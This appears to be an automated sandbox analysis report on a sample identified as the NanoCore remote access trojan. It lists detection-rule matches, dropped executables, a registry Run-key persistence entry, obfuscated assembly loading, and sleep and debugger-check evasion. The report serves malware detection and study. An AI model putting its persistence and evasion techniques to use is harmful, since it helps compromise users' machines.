      Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 656
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00406D5F0_2_00406D5F
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028E63C1_2_0028E63C
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028DA0F1_2_0028DA0F
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028D4BE1_2_0028D4BE
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028DF601_2_0028DF60
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028F3741_2_0028F374
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F0F9C1_2_005F0F9C
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F122C1_2_005F122C
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028E63C2_2_0028E63C
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028DA0F2_2_0028DA0F
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028D4BE2_2_0028D4BE
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028DF602_2_0028DF60
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028F3742_2_0028F374
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0040CBD12_2_0040CBD1
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_076714002_2_07671400
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_076633242_2_07663324
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_076642EB2_2_076642EB
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_076646D32_2_076646D3
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0319E4702_2_0319E470
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0319E4802_2_0319E480
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0319BBD42_2_0319BBD4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: String function: 00286EDB appears 34 times
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: String function: 00401EE0 appears 33 times
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: String function: 00283D50 appears 58 times
      Source: PhviZrlpkW.exeReversingLabs: Detection: 57%
      Source: PhviZrlpkW.exeVirustotal: Detection: 52%
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeFile read: C:\Users\user\Desktop\PhviZrlpkW.exeJump to behavior
      Source: PhviZrlpkW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\PhviZrlpkW.exe C:\Users\user\Desktop\PhviZrlpkW.exe
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe "C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 656
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe "C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 632
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.moJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeJump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeFile created: C:\Users\user\AppData\Roaming\ovawcpafrwkJump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeFile created: C:\Users\user\AppData\Local\Temp\nsu83B2.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@9/17@17/1
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{fc2f5233-89c0-4cab-99aa-8d389dd5dffd}
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5104
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2468
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0040147B GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_0040147B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: GetTickCount1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Sleep1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: VirtualAlloc1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Notepad1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: GetTickCount2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Sleep2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: VirtualAlloc2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Notepad2_2_002828A0
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: PhviZrlpkW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: tchnhwrvi.exe, 00000001.00000003.303187367.000000001AB50000.00000004.00001000.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000003.304084780.000000001A9C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: tchnhwrvi.exe, 00000001.00000003.303187367.000000001AB50000.00000004.00001000.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000003.304084780.000000001A9C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\xampp\htdocs\2efa81c4e6b34188a21ceb28fac598e4\Loader\Release\Loader.pdb source: PhviZrlpkW.exe, 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp, PhviZrlpkW.exe, 00000000.00000002.314365455.0000000002859000.00000004.00000020.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp, tchnhwrvi.exe, 00000001.00000000.299162939.0000000000290000.00000002.00000001.01000000.00000004.sdmp, tchnhwrvi.exe, 00000002.00000000.302278058.0000000000290000.00000002.00000001.01000000.00000004.sdmp, edpm.exe, 00000003.00000002.364296668.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000003.00000000.330467592.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000007.00000000.351397609.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000007.00000002.364278841.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe.1.dr, tchnhwrvi.exe.0.dr, nse83F1.tmp.0.dr
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp

      Data Obfuscation

      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeUnpacked PE file: 2.2.tchnhwrvi.exe.3330000.5.unpack
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00283D95 push ecx; ret 1_2_00283DA8
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00283D95 push ecx; ret 2_2_00283DA8
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0040D2E1 push ecx; ret 2_2_0040D2F4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028A192 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0028A192
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeFile created: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeJump to dropped file
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeFile created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rorscojuxnJump to behavior

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeFile opened: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-8693
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe TID: 6068Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-7410
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWindow / User API: threadDelayed 8834Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWindow / User API: foregroundWindowGot 885Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWindow / User API: foregroundWindowGot 785Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeAPI coverage: 4.0 %
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F0EBF GetSystemInfo,1_2_005F0EBF
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00406715 FindFirstFileExW,2_2_00406715
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeAPI call chain: ExitProcess graph end nodegraph_1-7347
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeAPI call chain: ExitProcess graph end nodegraph_2-28796
      Source: tchnhwrvi.exe, 00000002.00000002.564994074.000000000160B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00283B2B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00283B2B
